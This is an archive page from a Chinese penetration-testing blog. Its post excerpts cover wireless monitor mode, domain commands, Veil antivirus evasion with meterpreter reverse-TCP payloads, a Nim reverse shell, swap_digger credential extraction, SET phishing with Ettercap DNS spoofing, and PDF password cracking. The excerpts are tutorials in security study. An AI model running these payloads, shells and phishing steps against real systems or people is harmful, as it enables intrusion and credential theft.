avatar
文章
324
标签
30
分类
0

Home
Archives
Tags
Categories
List
  • Music
  • Movie
Link
About
The Blog of Monoceros406
搜索
Home
Archives
Tags
Categories
List
  • Music
  • Movie
Link
About

The Blog of Monoceros406

无线网络渗透基础原理
发表于2024-01-13|渗透测试
无线网络渗透基础设置监听模式2.4GHz WiFi网卡1sudo airmon-ng start wlan0 随后系统WiFi断开,wlan0接口改名为wlan0mon。 5GHz WiFi网卡仅支持芯片为RT3572和RTL8812AU的无线网卡,前者开启方式同2.4G网络,后者需要手动开启。 安装驱动: 1sudo apt-get install realtek-rt188xxau-dkms 查看无线网卡模式: 1iwconfig 发现为被管理模式,先停止无线网卡接口,设置为监听模式,再启动: 1234ip link set wlan0 downiwconfig wlan0 mode monitorip link set wlan0 upiwconfig #发现为监听模式 接口名还为wlan0 网络扫描Airodump-ng1airodump-ng wlan0mon 输出结果中每列参数: 列名 含义 BSSID 无线AP的物理地址。 PWR 信号水平,信号值越高离AP越近。为-1时标识客户端不在能监听到的范围内。当BSSID和PWR两列都为-1时,网卡驱动 ...
内网渗透命令大全
发表于2024-01-13|渗透测试
内网渗透命令大全域常用操作命令1234567891011121314151617181920212223242526272829303132net group /domain #获得所有域用户组列表net group qq_group /domain #显示域中qq_group组的成员net group qq_group /del /domain #删除域中qq_group组net group qq_group qq /del/domain #删除域内qq_group群组中的成员qqnet group qq_group /add /domain #增加域中的群组net group "domain admins" /domain #获得域管理员列表net group "enterprise admins" /domain #获得企业管理员列表net localgroup administrators /domain #获取域内置administrators组用户(enterprise admins、domain admins)net group & ...
Veil免杀入门
发表于2024-01-13|恶意代码
Veil免杀入门启动: 1veil 使用Evasion工具: 1use Evation 查看支持的攻击载荷: 1list 选择攻击载荷: 1use cs/meterpreter/rev_tcp.py 查看配置信息并配置: 12optionsset LHOST 192.168.29.134 生成攻击载荷: 1generate 生成可执行文件payload.exe。 还有另一种生成方式,直接使用命令行生成: 1veil -t Evasion -p cs/meterpreter/rev_tcp.py --ip 192.168.195.150 --port 4444 在MSF设置监听: 1234use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.29.134exploit 成功启动Meterpreter会话。
swap_digger使用方法
发表于2024-01-13|渗透测试
swap_digger使用方法在目标机器上下载并运行: 123wget https://raw.githubusercontent.com/sevagas/swap_digger/master/swap_digger.shchmod +x swap_digger.shsudo ./swap_digger.sh -vx -c -v输出冗余信息 -x获取扩展凭证 -c自动删除生成的工作目录。 功能有:自动提取swap并搜索Linux用户凭证、Web表单凭证、Web表单电子邮件、HTTP基本认证、WiFi SSID和密钥等。
SET常用方法
发表于2024-01-13|渗透测试
SET常用方法Web攻击向量依次选择选项1、2、3、1,即社会工程学攻击、Web攻击向量、证书获取攻击方式、使用Web模板,并输入目标主机IP地址,随后选择2,即克隆Google站点。 如果用户目录结构依赖/var/www/html目录,则需要复制/var/www/下所有文件到/var/www/html中,回车即可。 如果Apache等占用80端口,会提示关闭,y即可。 接下来需要使用Ettercap的dns_spoof插件实施ARP攻击和DNS欺骗。 修改/etc/ettercap/etter.dns,例如攻击主机IP为192.168.29.139,则添加: 1*    A    192.168.29.139 使用Ettercap发起ARP攻击,启动dns_spoof插件,实施DNS欺骗: 1ettercap -Tq -M arp:remote -P dns_spoof /192.168.29.139// /192.168.29.2// 当目标主机访问任何网站时 ...
Recon-ng初探
发表于2024-01-13|渗透测试
Recon-ng初探模块安装Kali自带Recon-ng,但模块一个没装,得科学上网,然后recon-ng的shell中执行: 1marketplace install all 示例选择模块: 1modules load recon/domains-hosts/hackertarget 查看模块信息: 1info 设置目标: 1options set SOURCE blog.bbskali.cn 运行模块: 1show hosts 实战枚举百度网站子域名,并导出为csv。 12345678helpshow modulesuse recon/domains-hosts/baidu_siteshow optionsset SOURCE baidu.comrunuse reporting/csvrun
PDF加密解密
发表于2024-01-13|渗透测试
PDF加密解密给文件添加密码: 1pdftk kali.pdf output out.pdf user_pw 666666 #kali.pdf加密为out.pdf 密码为666666 暴力破解: 1pdfcrack -f out.pdf -n 6 -m 8 -c 0123456789 #-f要破解的文件 -n最短多少字符 -m 最长多少字符 -c使用的字符集 支持字典: 1pdfcrack -f out.pdf -w pass.txt
Nim入门
发表于2024-01-13|编程语言
Nim入门配置按照实际情况配置IP及端口,保存文件为nimshell.nim。 123456789var    targetIP="192.168.1.25"    targetPort="4444"let    exitMessage="Exiting.."    changeDirectoryCommand="cd"    defaultDirectory="C:\\"try:    socket.connect(targetIP,Port(parseInt(targetPort))) 编译1nim c -d:mingw --app:gui nimshell.nim && mv nimshell.exe myshell.exe
Metasploit基础教程
发表于2024-01-13|渗透测试
Metasploit基础教程概述初始化启动PostgreSQL: 1service postgresql start 创建和初始化数据库: 1msfdb init 工作区创建123workspace #查看所有工作区workspace -a test #添加名为test的工作区workspace default #转到default工作区 导入扫描报告12db_import /root/openvas.xmlworkspace -v #查看导入的主机 模块查询预分析12host #查看扫描出的主机vulns #查看扫描出的漏洞 手动查找123456search [options] <keywords>    [options]:        -h 显示帮助        -o <file> 指定输出信息保存文件 格式csv        -S <string> 搜索指定字符串        -u 指定搜索模块 部分keywords: 关键字 描述 aka 别名 author 作者 arch 架构 bid Bugt ...
Kali-Linux渗透测试入门
发表于2024-01-13|渗透测试
Kali-Linux渗透测试入门信息收集发现主机netmask将IP范围转换为CIDR格式: 1netmask -c 192.168.0.0:192.168.2.255 将IP范围转换为标准子网掩码格式: 1netmask -s 192.168.0.0:192.168.2.0 traceroute获取目标主机路由条目: 1traceroute 62.234.110.28 nmap略。 netdiscover检查在线主机。 123netdiscover #尽可能发现多个在线主机netdiscover -r 192.168.1.0/24 #指定区间netdiscover -p #被动ARP监听 域名分析whois查找指定帐号/域名的用户相关信息。 1whois baidu.com dmitry用途同上。 123dmitry -w baidu.com #whoisdmitry -s baidu.com -o subdomain #-s查子域名 -o输出文件 要挂梯子dmitry -p 192.168.29.136 #端口扫描 dnsenum收集域名信息,如:主机地址信息 ...
1…222324…33
avatar
Monoceros406
Windows系统安全爱好者
文章
324
标签
30
分类
0
Follow Me
公告
哪里排版出锅了请告诉我QwQ QQ:1295625063
最新文章
C++后端开发入门-FTP服务器与Libevent初探2025-06-01
C++后端开发入门-HTTP服务器编程2025-05-31
C++后端开发入门-服务器模型编程2025-05-31
C++后端开发入门-UDP与原始套接字编程2025-05-25
C++后端开发入门-TCP服务器编程2025-05-19
标签
漏洞复现 数学建模 编程语言 PWN 解题报告 Win内核安全 Web3 Web 恶意代码 沙盒逃逸 渗透测试 OpenSSL Win驱动开发 C++ 其他 Win系统调试 密码学 WinAPI AWD Python GUI开发 后端开发 算法 Misc 取证 IoT 前端开发 逆向工程 UEFI 移动安全
归档
  • 六月 20251
  • 五月 20259
  • 十二月 202413
  • 十一月 202412
  • 十月 202420
  • 九月 20243
  • 八月 20248
  • 七月 202413
网站资讯
文章数目 :
324
已运行时间 :
本站访客数 :
本站总访问量 :
最后更新时间 :
©2020 - 2025 By Monoceros406
框架 Hexo|主题 Butterfly